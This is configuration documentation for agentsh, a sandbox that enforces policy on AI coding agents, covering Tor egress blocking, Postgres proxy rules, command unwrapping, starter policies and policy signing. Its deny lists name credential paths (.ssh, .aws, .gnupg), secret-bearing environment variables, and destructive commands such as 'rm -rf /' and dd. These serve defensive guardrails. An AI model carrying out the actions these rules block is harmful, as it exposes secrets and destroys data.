Onion gateway (allow mode)

When mode: allow and onion_rules is non-empty, agentsh activates a SOCKS-aware onion gateway. Connections to the local Tor SOCKS port are force-redirected into the gateway, which terminates the SOCKS5 handshake and evaluates each CONNECT/RESOLVE target against onion_rules (ordered, first match wins; onion matches a .onion address or a clearnet host with filepath.Match globbing). Allowed targets are forwarded to the real Tor daemon; denied or unmatched targets are reset (fail-closed). SOCKS RESOLVE (resolve-over-Tor without leaking DNS) is filtered through the same rules; RESOLVE_PTR and other SOCKS commands are rejected as unsupported.

Deny-by-default activates on upgrade

Because tor: is deny-by-default, a deployment with no tor: block will begin denying all five Tor vectors as soon as it upgrades to a build that includes this feature — including the local SOCKS/control ports (9050/9150/9051) and the built-in directory-authority IPs — for agents that never opted in. This is the intended posture, not a regression. If you run Tor intentionally, or want a gentler rollout, set tor.mode: audit (observe via tor_control events without blocking) or tor.enabled: false before upgrading.

Honest scope

Relay-IP matching is port-agnostic: a connection to any port of a seed or feed relay IP is treated as Tor. A few directory-authority IPs share netblocks with non-Tor services, so a legitimate connection to such an IP can be blocked as relay_ip; the escape hatch is vectors.relay_ips: false or tor.mode: audit. Private bridges are deliberately unlisted, so the relay-IP feed cannot enumerate them — bridge-based Tor is still caught by the processes and socks_ports vectors. Enforcement is Linux-first; the config parses on all platforms.

Database Access#

db_services declares database upstreams protected by the agentsh database proxy. The runtime database implementation is Postgres-family only: PostgreSQL and Aurora Postgres are supported, while Redshift and CockroachDB use the same path with beta coverage. Non-Postgres adapters remain roadmap items.

db_services:
  appdb:
    family: postgres
    dialect: postgres
    upstream: pg.internal:5432
    tls_mode: terminate_reissue

database_connection_rules:
  - name: allow-app-user
    db_service: appdb
    db_user: ["app"]
    database: app
    decision: allow

database_rules:
  - name: deny-mutations
    db_service: appdb
    operations: [write, modify, delete]
    decision: deny
    deny_mode_in_tx: terminate

  - name: allow-resolved-reads
    db_service: appdb
    operations: [read]
    relations: ["public.users", "public.orders"]
    match_object_resolution: catalog_resolved
    decision: allow

policies:
  db:
    unavoidability: enforce
    log_statements: parameters_redacted

db_services

Field	Type	Required	Description
`family`	`string`	Yes	Must be `postgres` today.
`dialect`	`string`	Yes	`postgres`, `aurora_postgres`, `redshift`, or `cockroachdb`.
`upstream`	`string`	Yes	Upstream `host:port`. Used for proxy upstream dialing and generated direct-egress deny rules.
`tls_mode`	`string`	Yes	`terminate_reissue`, `terminate_plaintext_upstream`, or `passthrough`. Statement rules require terminate mode.
`trusted_network`	`bool`	No	Required for plaintext upstream mode to a non-local destination.
`allow_function_call_protocol`	`bool`	No	Opt into PostgreSQL FunctionCall protocol forwarding. Default is deny.
`allow_gss_encryption`	`bool`	No	Opt into GSS encryption passthrough with degraded statement visibility.

database_rules

Statement rules run after the Postgres proxy classifies SQL into effects. Strict object coverage applies: every object touched by each effect must be covered by a non-deny rule, and any matching deny wins.

Field	Description
`db_service`	Match one declared service. Rules can also match by `db_family` or `db_dialect`.
`operations`	Required. Operation groups or aliases such as `read`, `write`, `modify`, `delete`, `session`, `transaction`, `bulk_export`, `unknown`, `READ`, `MUTATE`, or `*`.
`objects` / `schemas`	Syntactic object and schema globs from parsed SQL.
`relations`	Catalog-resolved relation selectors formatted as `schema.name`.
`functions`	Catalog-resolved function selectors formatted as `schema.name(identity_args)`; `schema.name(*)` matches overloads.
`match_object_resolution`	Resolution tag such as `catalog_resolved`, `qualified_syntactic`, `unqualified_syntactic`, `catalog_unresolved`, or `*`.
`require_where`	Boolean. Valid only on rules whose operations expand exclusively to `modify` and/or `delete`. When `true`, the rule matches only top-level `UPDATE`/`DELETE` effects that have a top-level `WHERE`.
`decision`	`allow`, `deny`, `approve`, `audit`, or statement-level `redirect`.
`deny_mode_in_tx`	For deny rules in transactions: `terminate` or `rollback_then_continue`.
`acknowledge_audit_on_dangerous`	Required to silence warnings for `audit` decisions on high-risk operation groups.

Require WHERE

Use require_where: true on narrow mutation rules to prevent accidental full-table UPDATE or DELETE statements from matching that rule:

database_rules:
  - name: allow-scoped-user-mutations
    db_service: appdb
    operations: [modify, delete]
    relations: ["public.users"]
    match_object_resolution: catalog_resolved
    require_where: true
    decision: allow

The guard checks syntax, not data safety. WHERE true satisfies it, and another unguarded non-deny rule can still cover the same mutation effect. Policy loading rejects require_where when the rule also matches operations outside modify or delete.

decision: redirect supports safe read-only relation replacement for Postgres. It requires read-only operations, exactly one canonical relations source selector, match_object_resolution: catalog_resolved, an eligible terminate-mode service, and redirect.relation as the canonical target. Unsupported redirect forms fail closed.

database_rules:
  - name: redirect-user-reads
    db_service: appdb
    operations: [read]
    relations: ["public.users"]
    match_object_resolution: catalog_resolved
    decision: redirect
    redirect:
      relation: public.safe_users

database_connection_rules

Field	Description
`match_kind`	`connect` (default), `cancel`, or `replication`.
`db_user`	Startup user list. Unavailable under `passthrough`.
`database`	Startup database name. Unavailable under `passthrough`.
`application_name`	Startup application name glob. Unavailable under `passthrough`.
`client_identity`	agentsh client identity selector.
`decision`	`allow`, `deny`, `approve`, or `audit`. `redirect` is invalid for connection rules.

policies.db

Field	Description
`unavoidability`	`off`, `observe`, or `enforce`. `observe` and `enforce` start proxy listeners and generated routing/bypass controls; `enforce` fails closed when required bypass-prevention context cannot be built.
`log_statements`	`none`, `parameters_redacted` (default), or `full`.
`approval_statement_preview`	`none`, `redacted` (default), or `full`.
`approval_statement_preview_chars`	Max preview length for approval prompts. Default is 200.
`escalate_unknown_functions`	Treat unknown function calls in `SELECT` as procedural unless allowlisted.
`safe_function_allowlist`	Function names that remain read-safe when unknown-function escalation is enabled.

See Database Proxy for runtime flow, unavoidability behavior, audit events, and limitations.

Transparent Commands Override#

Control which commands are transparently unwrapped by the execve interceptor. When a transparent command (like sudo, env, or nice) is detected, agentsh unwraps it and evaluates the payload command against policy instead. You can add custom wrappers or remove built-in ones.

transparent_commands:
  # Add custom task runners to the transparent list
  add:
    - myrunner
    - taskrunner
    - doas

  # Remove commands from the built-in defaults
  remove:
    - sudo     # Evaluate sudo itself, don't unwrap

Built-in transparent commands include common wrappers sudo, env, nice, nohup, time, and xargs. Linux additionally treats busybox, doas, strace, ltrace, and ld-linux* as transparent. Windows treats cmd.exe, powershell.exe, pwsh.exe, and wsl.exe as transparent.

Starter Policies#

Pre-built policies for common scenarios:

dev-safe.yaml

Safe for local development.

Allow workspace read/write
Approve deletes in workspace
Deny ~/.ssh/**, /root/.ssh/**
Restrict network to allowlisted domains

ci-strict.yaml

Safe for CI runners.

Deny anything outside workspace
Deny outbound network except artifact registries
Deny interactive shells
Audit everything

agent-sandbox.yaml

"Agent runs unknown code" mode.

Default deny + explicit allowlist
Approve any credential/path access
Redirect network tools to internal proxies
Soft-delete destructive operations

agent-default.yaml

Comprehensive policy for AI coding agents (Claude Code, Codex CLI, etc.). Designed for use with agentsh wrap.

Git guardrails — Redirects force push, hard reset, git clean, and direct push to main/master with helpful guidance messages
Destructive command protection — Blocks catastrophic rm -rf / patterns
System admin denial — Denies shutdown, reboot, systemctl, mount, dd
Dev toolchain allowlist — Allows git, make, npm, pip, gcc, node, python, and more
Credential protection — Denies access to .ssh/, .aws/, .kube/, .gnupg/
Environment filtering — Blocks iteration and denies *_SECRET*, *_API_KEY*, *_TOKEN patterns
Network — Default deny with allowlists for LLM APIs (Anthropic, OpenAI), package registries, GitHub, and localhost
Resource limits — 8 GB memory, 500 PIDs, 15 min command timeout, 12 h session timeout
Package rules — Blocks critical vulnerabilities and known malware

Policy Signing#

Policy files can be cryptographically signed with Ed25519 keys to prove authorship and detect tampering. When signing is enabled, agentsh verifies each policy file against a trust store of public keys before loading it.

Configuration

policies:
  signing:
    trust_store: "/etc/agentsh/keys/"   # Directory of trusted Ed25519 public key JSON files
    mode: "enforce"                    # "enforce" | "warn" | "off" (default: "off")

Field	Type	Default	Description
`policies.signing.trust_store`	string	—	Path to directory containing trusted public key JSON files. Each file contains an Ed25519 public key with `key_id`, `label`, and optional `expires_at`.
`policies.signing.mode`	string	`off`	`enforce` — reject policies with invalid or missing signatures (server refuses to start). `warn` — log a warning, load anyway. `off` — skip verification.

Signature file format

Each signed policy policy.yaml has a companion policy.yaml.sig file:

{
  "key_id": "a1b2c3d4e5f6...",     // hex(SHA256(public_key_bytes))
  "signature": "base64-encoded...", // Ed25519 detached signature
  "signer": "security-team",       // human-readable label
  "signed_at": "2026-03-18T..."    // ISO 8601 timestamp
}

Verification in all loading paths

Signature verification runs in all four policy loading paths:

Server startup (policy manager initialization)
Session creation (session-specific policies)
FUSE mount policy reload
Default policy loader

Every verification — success or failure — generates an audit event with key_id, signer, signed_at, and the verification result. Failure reasons include invalid_signature, unknown_key, missing_signature, and expired_key.

See Features → Policy Signing for the CLI workflow (keygen, sign, verify) and Setup → Policy Signing for configuration guidance.